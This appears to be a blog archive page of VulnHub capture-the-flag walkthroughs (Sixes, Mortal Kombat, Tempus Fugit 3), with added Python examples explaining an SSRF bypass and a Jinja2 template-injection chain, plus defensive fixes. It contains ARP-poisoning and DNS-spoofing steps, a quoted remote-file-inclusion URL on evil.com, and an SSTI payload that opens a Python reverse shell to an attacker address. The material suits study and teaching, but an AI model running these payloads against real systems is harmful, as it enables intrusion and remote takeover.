Posts

Showing posts from November, 2022

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. This is the first walkthrough of this machine on the internet. It involves a series of moves from which you can learn a lot ;)

1. Port scan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET
Nmap scan report for sixes.home (192.168.2.28)
Host is up (0.016s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http

We connect to the FTP server:
lftp 192.168.2.28:~> dir
-r--r--r--    1 0        0             233 Oct 03  2019 note.txt
lftp 192.168.2.28:/> cat note.txt
DONE:
  - Develop the web application frontend and backend
  - Add a firewall to block malicious tools
TODO:
  - Hire a Pentester to secure the web applicati...

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities

1. We are presented with the following:
Curl test page
admin area (works only if localhost)
test page
testpage: http://192.168.2.24/index.php?url=http://google.com

We try to reach localhost through the url parameter (SSRF):
http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php
you can only render page from google.com domain

2. We have to spoof the virtual machine's DNS request so that it believes "google.com" is 127.0.0.1, which lets us reach adminArea.php through the allowed host. On Kali, use ettercap:
- configure /etc/ettercap/etter.dns with: google.com A 127.0.0.1
- start it and run an ARP-poisoning MITM, selecting the victim as target1 and the router as target2
- enable dns spoofing

3. We access adminArea.php with Burp:
<!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...
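Why the DNS spoof works, and what would have stopped it, as an added example (this is not the box's PHP and not the author's code). The page only compares the hostname in the url parameter against google.com and then fetches whatever that name resolves to, so an attacker who controls the victim's DNS answer turns the allowed host into 127.0.0.1. The hardened variant also resolves the host and refuses any non-public address. The ALLOWED_HOST constant, the 142.250.74.110 address and the two resolver functions are constructed for the example; no real DNS query is made.

```python
"""Hostname-only SSRF allowlist versus a resolver-aware check.

Added example for the Mortal Kombat walkthrough, not the box's own code.
The resolvers below are constructed stand-ins for an honest DNS answer and
for the 'google.com A 127.0.0.1' record injected through etter.dns.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOST = "google.com"  # assumption: the single host the page allows


def host_allowed(url: str) -> bool:
    """String-only check, the behaviour the walkthrough describes.

    It inspects the hostname in the URL and never what that hostname
    resolves to, so it cannot distinguish google.com from a spoofed
    google.com that answers 127.0.0.1.
    """
    host = (urlsplit(url).hostname or "").lower()
    return host == ALLOWED_HOST or host.endswith("." + ALLOWED_HOST)


def system_resolver(host: str) -> set[str]:
    """Real lookup; only used when no constructed resolver is injected."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public(addr: str) -> bool:
    """True only for a routable, non-special address."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def render_allowed(url: str, resolver=system_resolver) -> tuple[bool, str]:
    """Hostname allowlist plus a check on every address the host resolves to.

    Returns (decision, reason). Refusing non-public answers closes the
    spoofed-DNS bypass: google.com resolving to 127.0.0.1 is rejected.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not host_allowed(url):
        return False, "you can only render page from google.com domain"
    try:
        addrs = resolver(parts.hostname)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    bad = sorted(a for a in addrs if not is_public(a))
    if bad:
        return False, f"{parts.hostname} resolves to non-public {bad}"
    return True, "ok"


# Constructed resolvers: an honest answer and the one etter.dns injects.
def honest_dns(host: str) -> set[str]:
    return {"142.250.74.110"}  # constructed public address, not a lookup


def spoofed_dns(host: str) -> set[str]:
    return {"127.0.0.1"}  # google.com A 127.0.0.1, as in the walkthrough


if __name__ == "__main__":
    target = "http://google.com/adminArea.php"
    print(host_allowed(target), host_allowed("http://127.0.0.1/adminArea.php"))
    print(render_allowed(target, honest_dns))
    print(render_allowed(target, spoofed_dns))
```

Even the hardened check leaves a time-of-check gap: the HTTP client performs its own lookup when it connects, so the address that passed the check must be the one actually used (connect to the checked IP and send the hostname in the Host header, or route the fetch through an egress proxy that enforces the same policy).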

TEMPUS FUGIT: 3: ssti, sqlcipher, proxychains, sftp, pyotp

A highly recommended machine. This is a hard, real-life box, created by @4nqr34z and @theart42 to be used as a CTF challenge on Bsides Newcastle, 23 November 2019, and released on Vulnhub the same day. In Tempus Fugit 3, the idea is still, like in the first two challenges; to create something "out of the ordinary". Advanced learning. I am not posting the flags.

1. The target is a Server: nginx/1.14.2
After some fuzzing we try an SSTI injection and it works:
http://tf3/{{7*7}}
Before the redirect we can see it returns a not found for tf3/49, so the expression was evaluated server-side. Therefore: SSTI for a reverse shell. With Burp we inject:
GET /{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.84\",9990));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(\...
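What the injected template is actually doing, as an added example in plain Python (this is not code from the post and does not need Jinja2). The payload never names import or os in the template itself: it walks from the empty tuple to object, lists object's subclasses, picks warnings.catch_warnings by its name, instantiates it to get the warnings module from the _module attribute, and takes __import__ out of that module's __builtins__. The functions below reproduce that chain step by step and use the recovered __import__ only to import os and read the working directory, as a harmless stand-in for the popen() call in the payload. The function names are mine.

```python
"""The Jinja2 SSTI gadget chain from the Tempus Fugit 3 payload, in plain Python.

Added example, not code from the post. It follows the same path the template
walks: () -> object -> object.__subclasses__() -> warnings.catch_warnings
-> instance._module (the warnings module) -> module.__builtins__ -> __import__.
Nothing is executed through a shell here.
"""


def find_subclass(name_fragment: str) -> list:
    """Same filter as the payload: object subclasses whose name contains the fragment."""
    return [c for c in ().__class__.__base__.__subclasses__()
            if name_fragment in c.__name__]


def builtins_via_warnings() -> dict:
    """Reach the builtins namespace without writing 'import' in the template.

    catch_warnings stores the warnings module on each instance as _module,
    and every module other than __main__ exposes the builtins dict as
    __builtins__. In CPython this is what makes the payload work.
    """
    for cls in find_subclass("warning"):
        try:
            module = cls()._module
        except Exception:
            continue  # a name match that is not the gadget, or not instantiable
        ns = getattr(module, "__builtins__", None)
        if isinstance(ns, dict) and "__import__" in ns:
            return ns
        if ns is not None and hasattr(ns, "__import__"):
            return vars(ns)  # __builtins__ was the module object, not its dict
    raise LookupError("no catch_warnings gadget found among object subclasses")


def gadget_import(module_name: str):
    """Equivalent of x()._module.__builtins__['__import__'](...) in the payload."""
    return builtins_via_warnings()["__import__"](module_name)


def cwd_via_gadget() -> str:
    """Stand-in for the popen() step: proves the recovered module really is os."""
    return gadget_import("os").getcwd()


if __name__ == "__main__":
    print([c.__name__ for c in find_subclass("warning")])
    print(gadget_import("os") is __import__("os"))
    print(cwd_via_gadget())
```

The fix on the application side is not to filter the payload but to stop building the template from the request: render a fixed template and pass the path in as a variable, and if user-controlled templates are a requirement, render them with jinja2.sandbox.SandboxedEnvironment, which refuses attribute access to names starting with an underscore, so the __class__ step at the head of this chain already fails.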